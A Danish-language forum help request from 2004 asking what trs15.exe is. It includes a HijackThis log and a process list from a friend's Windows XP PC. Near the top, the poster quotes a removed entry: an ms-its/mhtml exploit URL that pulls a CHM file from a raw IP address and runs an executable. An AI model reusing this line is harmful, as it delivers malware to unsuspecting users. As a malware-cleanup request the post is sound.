Hvad er trs15.exe? Vil nogen kigge disse logs igennem?
Problem på venindes computer. Jeg skulle bare lige opdatere win xp med sp2, installere norton systemworks 2004 inkl. antivirus 2004 og zonealarm 5. Dog er jeg ikke sikker på at alt er ok på pc'enjeg har kørt mwav.exe - den fandt:
C:\WINDOWS\autoload.exe, men oplyste - marked as - not a virus - no action taken. Det forstår jeg ikke? Derudover fandt den ikke noget.
Med hijackthis fandt jeg:
ms-its:mhtml:file://C:\foo.mht!http://82.179.166.145/x15.chm::/trs15.exe
Jeg valgte at fjerne den, da den så suspekt ud. Jeg kunne desværre ikke søge information om filen på nettet.
Når jeg søgte i google på trs15.exe for at søge info om filen fik jeg hver gang at vide at der var en bloodhound exploit 6 mine midlertidige internetfiler, hvorefter maskinen periodisk hang underligt. Kunne køre rundt med curseren, men kunne ikke klikke på noget. Dette problem eksisterer stadig trods alle mine diverse scans. Dog umiddelbart kun efter en googlesøgning på trs15.exe!!!!!
Håber nogen kan forklare ovenstående problem og mere eller mindre garantere at maskinen nu er ren.
Jeg har en teori om at det skyldes norton antivirus 2004, der blokerer forskellige processer indtil den kan scanne dem. Lyder det plausibelt?
Adaware fandt lidt forskelligt og Giant fandt også lidt. Bl.a. backweb adware relateret til kodak kamerasoftware.
Herunder hijackthis-log og efterfølgende oversigt over løbende processer - taget fra nortons process viewer.
----------Hijackthis-log---------------------------------------
Logfile of HijackThis v1.98.2
Scan saved at 19:34:16, on 05-12-2004
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Programmer\Fælles filer\Symantec Shared\ccSetMgr.exe
C:\Programmer\Fælles filer\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\drivers\KodakCCS.exe
C:\Programmer\Fælles filer\Microsoft Shared\VS7Debug\mdm.exe
C:\Programmer\Norton SystemWorks\Norton Antivirus\navapsvc.exe
C:\PROGRA~1\NORTON~1\NORTON~2\NPROTECT.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\Programmer\Norton SystemWorks\Norton Antivirus\SAVScan.exe
C:\WINDOWS\System32\ScsiAccess.EXE
C:\PROGRA~1\NORTON~1\NORTON~2\SPEEDD~1\NOPDB.EXE
C:\WINDOWS\System32\svchost.exe
C:\Programmer\Fælles filer\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ZONELABS\vsmon.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Programmer\QuickTime\qttask.exe
C:\Programmer\Browser Mouse\Browser Mouse\1.1\MOUSE32A.EXE
C:\Programmer\MultiMedia Keyboard\MultiMedia Keyboard\1.0\KbdAp32A.exe
C:\Programmer\Fælles filer\Symantec Shared\Security Center\SymWSC.exe
C:\Programmer\Fælles filer\Real\Update_OB\realsched.exe
C:\Programmer\Zone Labs\ZoneAlarm\zlclient.exe
C:\Programmer\D-Tools\daemon.exe
C:\Programmer\Fælles filer\Symantec Shared\ccApp.exe
C:\Programmer\Hewlett-Packard\AiO\hp psc 700 series\Bin\hpobrt07.exe
C:\Programmer\Adobe\Acrobat 5.0\Distillr\AcroTray.exe
C:\Programmer\Kodak\Kodak EasyShare software\bin\EasyShare.exe
C:\Programmer\Kodak\KODAK Software Updater\7288971\Program\backWeb-7288971.exe
C:\PROGRA~1\HEWLET~1\AiO\Shared\Bin\hpoevm07.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Programmer\Hewlett-Packard\AiO\Shared\bin\hpOSTS07.exe
C:\Programmer\Messenger\msmsgs.exe
D:\Nye programmer\hijackthis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://signon.stofanet.dk/
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hyperlinks
O1 - Hosts: 216.40.230.4 desktop.kazaa.com
O1 - Hosts: 216.40.230.4 alpha.kazaa.com
O1 - Hosts: 216.40.230.4 shop.kazaa.com
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programmer\Adobe\Acrobat 5.0\Acrobat\ActiveX\AcroIEHelper.ocx
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Programmer\Norton SystemWorks\Norton Antivirus\NavShExt.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Programmer\Norton SystemWorks\Norton Antivirus\NavShExt.dll
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\System32\NeroCheck.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Programmer\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [LWBMOUSE] C:\Programmer\Browser Mouse\Browser Mouse\1.1\MOUSE32A.EXE
O4 - HKLM\..\Run: [LWBKEYBOARD] C:\Programmer\MultiMedia Keyboard\MultiMedia Keyboard\1.0\KbdAp32A.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Programmer\Fælles filer\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [Zone Labs Client] "C:\Programmer\Zone Labs\ZoneAlarm\zlclient.exe"
O4 - HKLM\..\Run: [DAEMON Tools-1033] "C:\Programmer\D-Tools\daemon.exe" -lang 1033
O4 - HKLM\..\Run: [ccApp] "C:\Programmer\Fælles filer\Symantec Shared\ccApp.exe"
O4 - HKCU\..\Run: [MsnMsgr] "C:\Programmer\MSN Messenger\MsnMsgr.Exe" /background
O4 - Startup: ZoneAlarm Pro.lnk = C:\Programmer\Zone Labs\ZoneAlarm\zapro.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Programmer\Microsoft Office\Office10\OSA.EXE
O4 - Global Startup: HPAiODevice(hp psc 700 series) - 1.lnk = C:\Programmer\Hewlett-Packard\AiO\hp psc 700 series\Bin\hpobrt07.exe
O4 - Global Startup: Acrobat Assistant.lnk = C:\Programmer\Adobe\Acrobat 5.0\Distillr\AcroTray.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = ?
O4 - Global Startup: Kodak EasyShare software.lnk = C:\Programmer\Kodak\Kodak EasyShare software\bin\EasyShare.exe
O4 - Global Startup: KODAK Software Updater.lnk = C:\Programmer\Kodak\KODAK Software Updater\7288971\Program\backWeb-7288971.exe
O8 - Extra context menu item: E&ksporter til Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Programmer\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupdate.microsoft.com/v5consumer/V5Controls/en/x86/client/wuweb_site.cab?1102249572562
O16 - DPF: {D8575CE3-3432-4540-88A9-85A1325D3375} (e-Safekey®) - https://netbank.bgbank.dk/html/activex/e-Safekey/BG/e-Safekey.cab
O16 - DPF: {F6A56D95-A3A3-11D2-AC26-400000058481} (Danske e-Sec) - https://netbank.bgbank.dk/bgnetbank/activex/DanskeSikker.cab
----------løbende processer jf. process viewer--------------
AcroTray.exe 1744 C:\Programmer\Adobe\Acrobat 5.0\Distillr\AcroTray.exe
alg.exe 2728 C:\WINDOWS\System32\alg.exe
backWeb-7288971.exe 2200 C:\Programmer\Kodak\KODAK Software Updater\7288971\Program\backWeb-7288971.exe
ccApp.exe 392 C:\Programmer\Fælles filer\Symantec Shared\ccApp.exe
ccEvtMgr.exe 1044 C:\Programmer\Fælles filer\Symantec Shared\ccEvtMgr.exe
ccSetMgr.exe 1012 C:\Programmer\Fælles filer\Symantec Shared\ccSetMgr.exe
csrss.exe 460 C:\WINDOWS\system32\csrss.exe
ctfmon.exe 3472 C:\WINDOWS\system32\ctfmon.exe
daemon.exe 412 C:\Programmer\D-Tools\daemon.exe
EasyShare.exe 2072 C:\Programmer\Kodak\Kodak EasyShare software\bin\EasyShare.exe
Explorer.EXE 1792 C:\WINDOWS\Explorer.EXE
hpobrt07.exe 1624 C:\Programmer\Hewlett-Packard\AiO\hp psc 700 series\Bin\hpobrt07.exe
hpoevm07.exe 2360 C:\PROGRA~1\HEWLET~1\AiO\Shared\Bin\hpoevm07.exe
hpOSTS07.exe 2788 C:\Programmer\Hewlett-Packard\AiO\Shared\bin\hpOSTS07.exe
KbdAp32A.exe 224 C:\Programmer\MultiMedia Keyboard\MultiMedia Keyboard\1.0\KbdAp32A.exe
KodakCCS.exe 1344 C:\WINDOWS\system32\drivers\KodakCCS.exe
lsass.exe 548 C:\WINDOWS\system32\lsass.exe
mdm.exe 1368 C:\Programmer\Fælles filer\Microsoft Shared\VS7Debug\mdm.exe
MOUSE32A.EXE 196 C:\Programmer\Browser Mouse\Browser Mouse\1.1\MOUSE32A.EXE
msmsgs.exe 2584 C:\Programmer\Messenger\msmsgs.exe
navapsvc.exe 1404 C:\Programmer\Norton SystemWorks\Norton Antivirus\navapsvc.exe
NOPDB.EXE 1676 C:\PROGRA~1\NORTON~1\NORTON~2\SPEEDD~1\NOPDB.EXE
NPROTECT.EXE 1444 C:\PROGRA~1\NORTON~1\NORTON~2\NPROTECT.EXE
nvsvc32.exe 1468 C:\WINDOWS\System32\nvsvc32.exe
OPScan.exe 3600 C:\Programmer\Norton SystemWorks\Norton Antivirus\OPScan.exe
PrcView.exe 2676 C:\Programmer\Norton SystemWorks\Process Viewer\PrcView.exe
qttask.exe 204 C:\Programmer\QuickTime\qttask.exe
realsched.exe 260 C:\Programmer\Fælles filer\Real\Update_OB\realsched.exe
SAVScan.exe 1536 C:\Programmer\Norton SystemWorks\Norton Antivirus\SAVScan.exe
ScsiAccess.EXE 1612 C:\WINDOWS\System32\ScsiAccess.EXE
services.exe 536 C:\WINDOWS\system32\services.exe
smss.exe 364 C:\WINDOWS\System32\smss.exe
SOUNDMAN.EXE 2036 C:\WINDOWS\SOUNDMAN.EXE
spoolsv.exe 1208 C:\WINDOWS\system32\spoolsv.exe
svchost.exe 692 C:\WINDOWS\system32\svchost.exe
svchost.exe 756 C:\WINDOWS\system32\svchost.exe
svchost.exe 796 C:\WINDOWS\System32\svchost.exe
svchost.exe 852 C:\WINDOWS\System32\svchost.exe
svchost.exe 960 C:\WINDOWS\System32\svchost.exe
svchost.exe 1780 C:\WINDOWS\System32\svchost.exe
symlcsvc.exe 1804 C:\Programmer\Fælles filer\Symantec Shared\CCPD-LC\symlcsvc.exe
SymWSC.exe 252 C:\Programmer\Fælles filer\Symantec Shared\Security Center\SymWSC.exe
vsmon.exe 1876 C:\WINDOWS\system32\ZONELABS\vsmon.exe
winlogon.exe 492 C:\WINDOWS\system32\winlogon.exe
wmiprvse.exe 2540 C:\WINDOWS\System32\wbem\wmiprvse.exe
wuauclt.exe 600 C:\WINDOWS\system32\wuauclt.exe
zlclient.exe 428 C:\Programmer\Zone Labs\ZoneAlarm\zlclient.exe